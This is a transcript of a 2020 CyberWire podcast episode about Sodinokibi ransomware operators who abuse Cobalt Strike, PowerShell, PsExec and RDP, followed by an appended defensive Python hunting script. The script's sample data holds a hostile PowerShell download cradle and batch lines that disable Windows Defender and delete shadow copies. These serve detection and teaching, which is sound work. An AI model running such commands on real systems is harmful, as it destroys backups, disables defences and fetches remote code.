CyberWire Daily - Leveraging legitimate tools. [Research Saturday]
Episode Date: September 12, 2020
Researchers at Symantec spotted a Sodinokibi targeted ransomware campaign in which the attackers are also scanning the networks of some victims for credit card or point of sale (PoS) software. It is not clear if the attackers are targeting this software for encryption or because they want to scrape this information as a way to make even more money from this attack. Joining us in this week's Research Saturday to discuss the report is Jon DiMaggio of Symantec. The research can be found here: Sodinokibi: Ransomware Attackers also Scanning for PoS Software, Leveraging Cobalt Strike
Transcript
You're listening to the CyberWire Network, powered by N2K.
Hello, everyone, and welcome to the CyberWire's Research Saturday.
I'm Dave Bittner, and this is our weekly conversation with researchers and analysts tracking down threats and vulnerabilities, solving some of the hard problems of protecting
ourselves in a rapidly evolving cyberspace. Thanks for joining us.
So we were actually not looking at ransomware. We were looking at a tool that's being misused
by a lot of bad guys these
days called Cobalt Strike. That's Jon DiMaggio. He's a senior threat intelligence analyst at
Symantec, a Broadcom company. The research we're discussing today is titled Sodinokibi,
ransomware attackers also scanning for PoS software, leveraging Cobalt Strike.
So Cobalt Strike is a legitimate pen testing tool.
It's used essentially to test an organization's security posture so they can decide if they need to make changes to their defenses and how to best protect.
What we found was a lot of ransomware attackers, enterprise ransomware attackers specifically, were leveraging that and using it to get the initial foothold on organizations before they deploy ransomware.
So by looking at these sort of rogue deployments of this Cobalt Strike tool, what we found is, you know, when we started to look, we found, oh, this looks kind of interesting.
And we started to pull some threads and we started to see, okay, well, they're using this Cobalt Strike tool and, you know, now they're moving and they're using, you know, a lot of the legitimate tools within the network.
And, you know, they're dropping specific files, looking to turn off certain services. And long story short, it really built out a profile that was very familiar to us. At that point,
we believed it was one of the enterprise ransomware attack groups that we have been following or
tracking. And just sort of profiling and looking at those behaviors along with sort of the tools that they were using,
we were able to identify that this was a much larger scale attack.
It took a little bit, but once we eventually were able to find the payload, the ransomware payload,
and that really is the biggest differentiator between the handful of enterprise ransomware groups that are out there, they really do follow
almost the exact same steps when they're in networks. They're very, very similar these days.
Get in, use legitimate tools, go unnoticed, try to blend in with administrative traffic.
And it's not until they drop their payload that they give us something unique,
usually, to identify them. So we try to profile these groups. We try to build a digital
fingerprint of them per se based off of the tools, even legitimate ones that they use, the order that
they use them in, any behaviors that we see, as well as their malware. The thing about it is,
you know, these enterprise ransomware groups, you know, they're human beings behind the keyboard, and they all spend time in the environment
prior to actually engaging the ransom piece.
That's the last thing that they do.
There's a number of things, though, that were unique to this group that really made them
stand out from other groups.
But in essence, it's not until you see that ransom payload at the end that you can really
know who it is.
But there are some good giveaways that give you a clue that this is an enterprise ransomware attacker.
And obviously, that's the biggest concern to a lot of organizations these days is ransomware.
So it just set off a lot of alarms for us, and we started alerting customers, and we were able to prevent some of these attacks.
One of the big things that differentiates this group, however, there's sort of a minor
and a major point that are very different.
So a minor point, which is very interesting, was they were looking at point of sale devices
and software in organizations.
That's a little bit different than what we're used to seeing.
But the other thing that's really unique,
there's a couple of groups doing this, but not many.
And the Sodinokibi group is one of them.
They're actually not just encrypting and holding your data.
If you don't pay, they're threatening to post that publicly
on sites like PaySpin and other publicly available infrastructure to embarrass the organization, to hurt their customers, to hurt their credibility in order to force them to pay.
So they don't really care how they get an organization to pay.
Maybe they don't hit the ransom that they want, but they're going to do what they can, whether it's taking advantage of your point of sale software, whether it's posting and or selling your data, and if you don't do any,
they're just going to embarrass you. So that makes them, in my mind, a little bit more dangerous.
It's sort of like ransomware, enterprise ransomware 2.0. We're seeing this change,
and there's a couple of groups doing it, but it wouldn't surprise me if we see that trend
increasing over the next year. Well, let's walk through some of the details together. Why don't we start with
Cobalt Strike? Can you give us a description of exactly what is that capable of doing and how do
they implement that to get what they're after here? Sure. So as I mentioned, it's a legitimate
tool. It's used for legitimate pen testing.
But what it does is it allows the – let's just go from the perspective of how the bad guy uses it.
It allows the bad guy to load shellcode onto machines.
Once they do that, they actually can load it into memory, and then they can compile, like old-school compile manually the shell code, and that's what they're doing.
They're using PowerShell, which is already in the environment
and comes on most Windows systems.
They're using that to download, to run PowerShell scripts
in memory of the victim system.
So it's not even, it's fileless.
It's not even on the system.
So it makes it much harder to detect is the reason I'm pointing that out.
And it downloads it, they compile it, and once they compile that code, now they actually have Cobalt Strike.
And that can be used for quite a number of purposes, everything from creating a reverse shell so that the attacker can now log in and access the network themselves, human on a keyboard access,
or it can be used to upload and download other binaries.
So they can download other malware if they want. And that's one of the main ways that we see where often they do obtain the ransomware payload.
They can download other tools.
However, I got to say, we usually, or with this group anyway,
the main thing that we see is they try to use the tools that are in the environment first.
And that's actually really smart on their behalf because it makes it harder to detect when they blend in with your legitimate traffic.
The one key to that, though, is if an organization has their security controls and their access sort of locked down and who has certain permissions
locked down, only administrators should have those tools. So in essence, you wouldn't have to look at
every machine or every user account on your infrastructure in order to monitor that, but you
would have to look at your administrators and see what they're doing because that's the tools these
guys are using. If they can't leverage those tools, then they download other things.
So we might see them download like Mimikatz, for example,
which is a tool that's also publicly available, free, and used by pen testers.
So they'll download that to obtain the credentials off of systems in the environment
to increase their privileges.
But one thing about that, what we used to see is bad guys would have their own custom
malware, and the advantage to that would be something we haven't seen.
They might have a better chance of getting past defenders or security software that catches
this stuff because it's something that's brand new and never been seen before.
However, what they've learned over time is the industry has gotten better at detecting those things just through the behavior of it, whether it's a new binary or not.
They've realized that they can use the legitimate tools. And when they can't, like an example I just
gave with Mimikatz, the benefit of that is even if we catch you, anyone can download and use it.
So it makes the attribution and using it for evidence and pointing a finger at someone much
harder because anyone in the world could download it and use it even though it's being used maliciously.
So it makes it hard for attribution and it benefits the adversary.
Now, one thing you noted here in your research is that the initial exploitation
usually comes through brute forcing, taking advantage of remote desktop protocol?
Yeah, so that's a big one.
Essentially, they scan get one that works.
Also, it depends. There's two ways that they use that.
Sometimes they'll use it on publicly facing infrastructure, so that means prior to having access, they'll do this.
And it's really bad when organizations have that open on their external infrastructure.
But with business needs today, sometimes shortcuts are taken or there's just a necessity where organizations are willing to take that risk.
Well, these bad guys are looking for that, and that's one of the things they exploit.
But one of the other ways that they use it, and this is also unique, is. They have another method.
Let's say they use spear phishing or let's say they find some other vulnerability on your public-facing infrastructure to get in.
Once they're in, they'll scan your internal network because a lot of organizations feel safe on the inside using that.
It makes administrating components easier, server administration, services, everything else.
And they feel safe because it's on their internal network. Well, once the bad guy has access, again, it's very easy to exploit,
and that's why they do that. So whether it's on the outside, which is worse, or the inside,
it still allows adversaries to use that as a mechanism to gain further foothold and increase their privileges and escalate their ability to
hurt the organization or to plant malware or ransomware or to steal your data or whatever
it might be. And these folks seem to be really targeting specific organizations. They're trying
to maximize the possibility for payback here? They are.
So one of the things that they do
is they really assess their victims.
And what I mean by that is
they want them to pay the ransom, obviously.
So they try to assess what is an amount
that we think this organization can pay
where it's not going to be unreasonable,
it's not going to hurt them financially, publicly,
but it's something that'll be easy enough for them to pay
and worth our time to do the attack
for the bad guy's value, the return on value.
Because like I said, they're spending time.
We're seeing anywhere from three to seven days
where they're on the network
prior to actually executing the ransom piece of this.
So by doing that, they're
there for a while, they're investing their time, and they look at like how many servers they have,
how many domain controllers they have, what types of servers are there, they file servers,
are they running services, are those services for their internal or for the external. So what I'm
getting at, and the reason I'm pointing that out is they literally do an
assessment of the victim. The more infrastructure, the more services, the more resources that they
have, as well as publicly available information on their profit margins, things like that,
all those sort of things they take into consideration when they, or it appears they
take that into consideration because
you'll see from one victim to the next, you know, there's differences in the ransom they ask,
and it really appears to be they're actually assessing and they want to give an amount that
you'll actually pay. Now, once they decide to pull the trigger and activate the ransomware, what happens next? So at that point, just being
direct here, you're in a lot of trouble at that point. The time to act is when they're on your
network for those three to seven days to stop it. Once that happens, at this point in time,
the encryption that they're using is not something we can defeat. Not just us, I mean, my company, I mean, anyone. You're not able to decrypt it without
that key. So if you don't get that key, you're never going to access that data again, you're
going to have to rebuild, hopefully you have offsite backups or whatever your backup plan is.
But you know, your actual systems that data is encrypted,
they actually go in and delete any local backups
or any backup servers that they can identify.
So you really need to have a complete separate network
with your backup data.
But they go in and delete that.
They make sure that you're going to be in trouble.
So once that encryption process takes place,
I mean, that's really all it is.
They're just encrypting data.
And I say just because we use that every day in the world for legitimate purposes.
They're just encrypting it, and they're using an encryption algorithm that, at this point in time, hasn't been broken so that they really have the ability to force you to pay or spend a lot more money having to rebuild your network infrastructure.
And like I mentioned, these guys take it a step further.
In addition to that, they're going to embarrass you publicly and try to hurt you and your public image
by posting you and or your customers' data.
They literally will try to pressure customers to call and be upset with the organization.
They'll actually post stuff on forums like, here's data, and they'll post a message.
Company X was warned, they refused to pay, and now your data is not secure.
Things of that nature.
So they really put a lot of effort to hurt you if you don't pay.
And that's why I said it's kind of ransomware 2.0.
It's scary how they're evolving the things that they're doing,
because it's one thing to
lose access to your data, but then it's another to have to deal with a public relations aspect,
especially if you're a publicly traded company. So it's definitely a scary world with these types
of attack groups. What sort of insights do you have on the exfiltration part of it? I'm curious. So one thing I wonder about is,
are they encrypting first
and then exfiltrating that encrypted data?
Or are they sending the data in the clear?
Do you have any insight into that?
Yeah, no, they're encrypting the data.
Now you got to remember, they have the key.
So it's very easy.
And by encrypting it,
when it's going out the door,
it blends in with other encrypted data and communications and protocols that a defender would naturally see.
So not only does it blend in, but it also isn't going to set off any alarms or whistles or anything like that because it's encrypted. So they've already owned the network. By the time – that's what I was saying. By the time the encryption takes place, they have gained – they now have legitimate accounts with legitimate administrative permissions.
And they're coming and going.
They've got remote access.
They're coming and going into your network.
And, yes, they're stealing that encrypted data.
They have it.
They unencrypt it on the back end.
They look through it.
They find what they consider the high-value data, and that's what they use to embarrass.
And they don't just post it all.
They threaten, hey, you're going to pay us.
If you don't, we're going to do X.
And then they'll give you a sample, and they'll post just a little bit, not enough to hurt you too much, but just enough to show that they're for real, that they're serious.
And then if you still don't pay, then they do a lot more damage by releasing that information.
But yeah, they try to give the opportunity.
Their goal doesn't appear to be to embarrass.
It's not a revenge thing. I don't think they actually want to post the user's data.
They just want them to pay, period.
They pay.
They don't post the data.
But if they refuse to pay, then yeah, then they go all in and try and hurt the organization as much as they can.
And what's their track record?
Do you know if people do pay, do they get their data back?
So this group is not – let me answer that from the aspect of,
so there's not a ton of enterprise ransomware attackers out there. There's a bazillion,
you know, elements of ransomware, but the actual organized enterprise ransomware attackers,
there's maybe a dozen of them. And that's really not a lot when you think about, you know,
from a global perspective. So when we, when most of these guys, when you pay, they know it's going to
be a very public event that you've been attacked and that you're being held ransom.
So most of the track record for most of the enterprise groups is they do actually provide
you the key after you pay.
And the reason they do that is, again, this is their job.
It's almost a business. They're not just regular criminals. I mean, this is what they get up and
do every day. They're professionals, you know, that they're not run-of-the-mill criminals. They
just want the money. It's not personal. It's not revenge. They want the money. So what they want
to make sure that the next victim pays too. So yes, the track record for enterprise attacks is to provide that key
if the victim pays. So what are your recommendations here? I mean, at what points along this attack
path do folks have an opportunity to stop it? So that's really, I think, the best kept secret about all this that I think really needs to be discussed
more. One of the things we're looking at right now as a project that I'm working is we're going
through all these enterprise ransomware attacks over the last year, and we're looking at what we
call dwell time, the time on network between initial access and when they
execute the ransom. And I can tell you that most of these groups, it's less than seven days.
This particular group was three to 10, but most of them, the average is less than seven. So it's
right around a week on your network. During that time, every day they increase their foothold. But
during that time, that is when you have the
opportunity to stop them. That is when you have the opportunity to detect, deter, and get them
off of your network and resources. The thing is, we as a culture in the industry, we're just very
reactive. So, you know, Defenders, it's just the mentality, and it's
slowly changing, but the mentality is to be reactive. And this requires a very proactive
hunting aspect to your defenses. And what I mean by that is you're not going to find them if you're
just looking for something to be flagged as malicious. You have to look at the legitimate tools,
administration tools,
and how they're being used on your network.
You know, we talk about,
this is going to be really basic,
but separation of privileges,
not allowing anybody to have all the keys to the kingdom.
If you really segregate the tools
that are in your environment
that are legitimate administrative tools
to only be on systems
and available to legitimate administrators, well, now you're talking maybe 10, 15% of your daily
activity that you have to monitor. So if you were to just do a random audit of that, let's say you
look at 10% of that activity every day, just doing that, you're going to dramatically increase your
chances of identifying things like
this. But that window of time when they're on your network, when they're using legitimate tools
and publicly available tools or any sort of pen testing tool that's being used, that is when you
need to prevent this. That's the window of opportunity. Once the execution of the ransomware
happens, to be honest with you, it's too late. You're really in the control of those attackers at that point.
So is my understanding correct here that rather than looking for a piece of malware, a piece of code,
because as you say, they're living off the land.
They're using tools that would normally be installed that wouldn't draw attention to themselves, that what you really need to be looking for are particular behaviors, particular activities that
might be out of the ordinary? Exactly. So things like they use a legitimate tool,
and this isn't just this group. I'm going to give you some examples that are common across
many of these dozen or so enterprise ransomware attackers.
One of the big things that they use, PowerShell and a tool called PSExec.
Both are used for administrative purposes.
PowerShell is extremely powerful, no pun intended.
And it allows them to run these scripts.
And they can even set schedules to run them to do different various tasks.
But what they do then with the PSExec tool is that's what they actually use to drop and to spread everything from ransomware to other tools and components.
They also use what's called bat files, which is just basically it's almost like a text file with a set of a stream of
commands that you run on the system. And they'll use this tool to deploy that. But things like that
you can flag like that's probably well, yes, that could be flagged as typical. But looking at that
and looking at these files, well, if you would actually just open that file up, these bat files in a text editor, you'd see that they were searching
and trying to identify security tools and firewalls or whatever it might be, things of that nature.
There's usually a list of all, and this is again common with all these groups, there'll be a list
of specific things that they're looking for that are shared that we sort of see used a lot. So
that's not really something your regular administrator is going to be doing. So watching this tool used to drop these files, just taking a look and seeing what they're
doing, again, just auditing the legitimate stuff. It sounds difficult, but that is the mindset that
we have to get if we're going to start catching these guys. It's not necessarily spending a
bazillion dollars on security tools and everything else. I'm not saying that you don't have to have
a strong security budget and security posture, but what I am saying is
even with that, that's not what's going to catch these guys. You have to have a human being
going and looking at the legitimate traffic. There's tools and software to help with that
as well, but you can't just wait for a red alarm to go off to say,
hey, there's malware on your network because that's not what they're using. You've got to look at the legitimate
activity as well.
I know, Jon, you and your team spend a lot of time looking at this sort of ransomware,
but also many of the other flavors and indeed different variants of malware.
I mean, is this the shape of things to come?
Should we expect to see more of this? Is this the direction
that this professionalization of this, is this where you sense things might be headed?
Yes and no. So it's definitely where we're headed, but it's not just the everyday criminal
that can pull this off. And what I mean by that is it takes several, it takes multiple people.
It takes a lot of coordination and it takes a lot of discipline to not make mistakes.
So it's, that's why I said that they're professionals, what they do at certain times,
the tools that they use, not using regular malware, spending the time on the network,
learning it, going undetected. It's sort of a discipline that these attackers use. And again, it's very
organized in the profiling, the figuring out who to ask for the ransom and who not to and how much
and figuring all those little details out. But that's the piece why I said that it's the way
we're going, but it's not as easy where you're going to see it blow up to where it's – everybody, every average criminal is going to do is because it is actually a difficult operation to execute, and it does take a lot of time and work.
If you're someone who has a regular day job, you're not going to have time to spend seven to ten days every day going into someone's network to try
to identify this activity. So this is all these guys do. They're professional. They know the tools.
They know the environment. It's not the first time they're using them when they go in. They're
well-rehearsed, and they really seem to know what they're doing. Now, one way, though, that you
could, unfortunately, we're not doing this, but one way that would really deter this is if everybody just stopped paying.
If they knew that it was less likely that an organization would pay, you wouldn't have all this happening.
You wouldn't have new groups popping up.
You wouldn't have them spending the time and resources to come up with new infrastructure and new creative ways to own an organization.
But most pay, unfortunately.
It's always recommended not to for that very reason, because if everybody stopped paying,
this just wouldn't be as lucrative and these guys would go find something new to do.
If you recall, there's other groups out there that have sort of evolved, like there's the
Evil Corps group sort of evolved. They used to be in the banking Trojan business,
and now they're an enterprise ransomware attacker.
So they transitioned.
They do what they can to get the money.
That's really what it's about is the money.
As I've mentioned that several times,
and I do that because with a lot of attackers,
it'll be personal.
They'll want to hurt an organization or whatever it is,
or they'll have some sort of a hacktivist reason where they have a cause and they want to cause embarrassment. That's not
what these guys are doing. It's all professional. It's all about the money.
Our thanks to Symantec's Jon DiMaggio for joining us. The research is titled Sodinokibi: Ransomware Attackers also Scanning for PoS Software, Leveraging Cobalt Strike. The CyberWire is proudly produced in Maryland out of the startup studios of DataTribe, where they're co-building the next generation of cybersecurity teams and technologies.
Our amazing CyberWire team is Elliot Peltzman,
Puru Prakash,
Stefan Vaziri,
Kelsey Bond,
Tim Nodar,
Joe Kerrigan,
Carol Terrio,
Ben Yellen,
Nick Valecki,
Gina Johnson,
Bennett Moe,
Chris Russell,
John Petrick,
Jennifer Iben,
Rick Howard,
Peter Kilpie,
and I'm Dave Bittner.
Thanks for listening.
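The hunting approach described in the conversation above (auditing how legitimate administrative tooling is being used rather than waiting for a malware alert: PowerShell scripts pulled down and run in memory, PsExec pushing files to other hosts, batch files that stop security services and delete backups, and RDP brute forcing) can be turned into a concrete triage script. What follows is an added example written for this page; it is not code from the CyberWire, from Symantec, or from the research report. The Windows event records, the batch file contents, the IP addresses and the watch-list of security-product service names are all constructed for illustration, and the thresholds are assumptions a defender would tune to their own environment.

```python
"""Behaviour-based hunt over Windows event records for the ransomware tradecraft
discussed in the episode. Added example; all sample data below is constructed."""
import base64
import re
from collections import defaultdict
from datetime import datetime, timedelta

# Assumption: substrings of security-product service/process names worth watching.
SECURITY_SERVICES = ("windefend", "sense", "msmpsvc", "msmpeng", "sophos",
                     "mcafee", "symantec", "sepmaster")
SERVICE_STOP = re.compile(r"\b(net\s+stop|sc\s+(?:stop|config|delete)|taskkill)\b", re.I)
BACKUP_TAMPER = re.compile(
    r"vssadmin.*delete shadows|wbadmin.*delete|bcdedit.*recoveryenabled\s+no", re.I)
# PowerShell -e / -ec / -enc / -EncodedCommand takes base64 of a UTF-16LE script.
ENC_FLAG = re.compile(r"-(?:e|ec|en|enc|encodedcommand)\s+([A-Za-z0-9+/=]+)", re.I)
# Classic in-memory download cradle: fetch a script and hand it to Invoke-Expression.
CRADLE = re.compile(
    r"(IEX|Invoke-Expression).*(DownloadString|DownloadData|WebClient|Invoke-WebRequest)", re.I)


def decode_encoded_command(cmdline):
    """Return the decoded -EncodedCommand payload, or None if there is none."""
    m = ENC_FLAG.search(cmdline)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1)).decode("utf-16le")
    except (ValueError, UnicodeDecodeError):
        return None


def tag_command(cmd):
    """Behaviour tags for one command line (empty for ordinary admin activity)."""
    tags = []
    decoded = decode_encoded_command(cmd)
    if decoded is not None:
        tags.append("powershell_encoded_command")
    if CRADLE.search(decoded or cmd):
        tags.append("in_memory_download_cradle")
    if SERVICE_STOP.search(cmd) and any(s in cmd.lower() for s in SECURITY_SERVICES):
        tags.append("security_service_tampering")
    if BACKUP_TAMPER.search(cmd):
        tags.append("backup_deletion")
    return tags


def scan_batch(text):
    """Open the .bat file, as the episode suggests, and tag what it would do."""
    tags = set()
    for line in text.splitlines():
        tags.update(tag_command(line))
    return tags


def classify_event(ev):
    """Tags for one event: 4688 = process creation, 7045 = new service installed."""
    if ev["event_id"] == 4688:
        return tag_command(ev.get("command_line", ""))
    if ev["event_id"] == 7045:
        # PsExec installs a PSEXESVC service on the target host it pushes to.
        blob = (ev.get("service_name", "") + ev.get("image_path", "")).lower()
        return ["psexec_service_install"] if "psexesvc" in blob else []
    return []


def rdp_brute_force_sources(events, threshold=10, window=timedelta(minutes=5)):
    """Source IPs with >= threshold failed RDP logons (4625, logon type 10) in a window."""
    per_src = defaultdict(list)
    for ev in events:
        if ev["event_id"] == 4625 and ev.get("logon_type") == 10:
            per_src[ev["source_ip"]].append(ev["time"])
    flagged = set()
    for src, times in per_src.items():
        times.sort()
        for i in range(len(times)):
            j = i
            while j < len(times) and times[j] - times[i] <= window:
                j += 1
            if j - i >= threshold:
                flagged.add(src)
                break
    return flagged


def hunt(events):
    """Aggregate behaviour tags per host plus RDP brute-force sources."""
    per_host = defaultdict(set)
    for ev in events:
        per_host[ev["host"]].update(classify_event(ev))
    return {"hosts": {h: t for h, t in per_host.items() if t},
            "rdp_brute_force": rdp_brute_force_sources(events)}


# ---- constructed sample data (not real telemetry) ----
def _b64_utf16(script):
    return base64.b64encode(script.encode("utf-16le")).decode()

T0 = datetime(2020, 9, 1, 2, 0, 0)
SAMPLE_BAT = "@echo off\nnet stop WinDefend /y\nsc config WinDefend start= disabled\n" \
             "taskkill /F /IM MsMpEng.exe\nvssadmin delete shadows /all /quiet\n"
SAMPLE_EVENTS = [
    {"time": T0, "host": "WS01", "event_id": 4688, "command_line": "powershell.exe -nop -w hidden -enc "
     + _b64_utf16("IEX (New-Object Net.WebClient).DownloadString('http://203.0.113.5/a')")},
    {"time": T0 + timedelta(minutes=5), "host": "SRV01", "event_id": 7045,
     "service_name": "PSEXESVC", "image_path": r"%SystemRoot%\PSEXESVC.exe"},
    {"time": T0 + timedelta(minutes=6), "host": "SRV01", "event_id": 4688,
     "command_line": "net stop WinDefend"},
    {"time": T0 + timedelta(minutes=7), "host": "SRV01", "event_id": 4688,
     "command_line": "vssadmin.exe delete shadows /all /quiet"},
    {"time": T0 + timedelta(hours=1), "host": "WS02", "event_id": 4688,   # benign admin use
     "command_line": "powershell.exe Get-Service | Where-Object Status -eq Running"},
] + [{"time": T0 - timedelta(seconds=3 * i), "host": "GW01", "event_id": 4625,
      "logon_type": 10, "source_ip": "198.51.100.7"} for i in range(12)] + [
    {"time": T0 + timedelta(hours=2), "host": "GW01", "event_id": 4625,
     "logon_type": 10, "source_ip": "192.0.2.10"}]

if __name__ == "__main__":
    print(hunt(SAMPLE_EVENTS))
    print(scan_batch(SAMPLE_BAT))
```

None of these signals is malware: every one of them is a legitimate tool or command an administrator might run, which is exactly why the script tags behaviours per host rather than raising a single verdict. The value is in the combination on one host inside the dwell-time window, and in reviewing the tagged activity against what the administrators who own those tools actually did.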